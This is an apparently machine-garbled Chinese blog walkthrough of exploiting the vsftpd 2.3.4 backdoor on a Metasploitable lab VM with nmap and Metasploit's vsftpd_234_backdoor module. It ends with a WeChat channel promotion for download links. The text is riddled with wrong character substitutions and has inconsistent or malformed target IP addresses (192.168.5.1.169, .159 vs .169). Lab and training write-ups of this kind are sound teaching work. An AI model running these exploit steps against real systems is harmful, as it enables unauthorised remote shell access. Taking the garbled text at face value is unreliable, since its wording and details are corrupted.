共计 1116 个字符,预计需要花费 3 分钟才能阅读完成。
引言
Metasploit 我的项目是一个旨在提供安全漏洞信息计算机平安我的项目,能够帮助平安工程师进行浸透测试(penetration testing)及入侵检测零碎签名开发。Metasploit 我的项目最为出名的子项目是开源的 Metasploit 框架,一套针对近程主机进行开发和执行“exploit 代码”的工具。
Metasploitable 是一个刻意制作进去蕴含破绽的 Linux 虚拟机零碎。它能够用来做平安训练,测试平安工具和练习浸透测试技术。本文将应用 Metasploit 和 Metasploitable 和大家独特分享一下如何应用 Metasploit 这块浸透测试利器针对特定版本的 vsftpd 进行利用达到控制目标主机的目标。本文采纳 Metasploit 和 Metasploitable 的镜像安装包,从而免去了繁琐的软件装置、环境配置阶段,相干下载链接在文章开端。利用的 vsftpd
2.3.4 版本的 vsftpd 存在这样的一个破绽,当在用户名后加上 ”:)” 时会触发 ftp 服务器的 6200 端口连贯的 shell
浸透利用过程
(1)首先应用 nmap 查看指标主机,指标即为装置了 Metasploitable 的服务器(本文装置 Metasploit 的服务器 IP:192.168.5.141,装置 Metasploitable 的服务器 ip:192.168.5.1.169)凋谢的端口
执行命令:nmap 192.168.5.169
(2)应用 Metasploit 搜查和 ftp 无关的扫描模块,执行命令:search scanner/ftp
(3)因为该破绽只针对特定版本的 vsftpd(2.3.4 版本)所以首选须要应用 auxiliary/scanner/ftp/ftp_version 模块探测指标机器上 vsftpd 的版本号
执行命令 1、use auxiliary/scanner/ftp/ftp_version
2、set RHOSTS 192.168.5.159
3、exploit
(4)搜查该服务可能被利用的利用模块
search vsftpd
(5)应用该模块
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.5.169
exploit
总结
咱们通过利用 2.3.4 版本的 ftp 存在一个 backdoor 破绽胜利拿到指标机器的 shell。以上过程仅供大家学习,不足之处也心愿大家多多指导!切勿将其非法路径,违法必究!下载链接:首先请关注微信公众号平安明码盒,扫描下方二维码即可关注
回复 ”metasploit” 即可获取 Metasploit 的下载链接
回复“metasploitable”即可获取 Metasploitable 的下载链接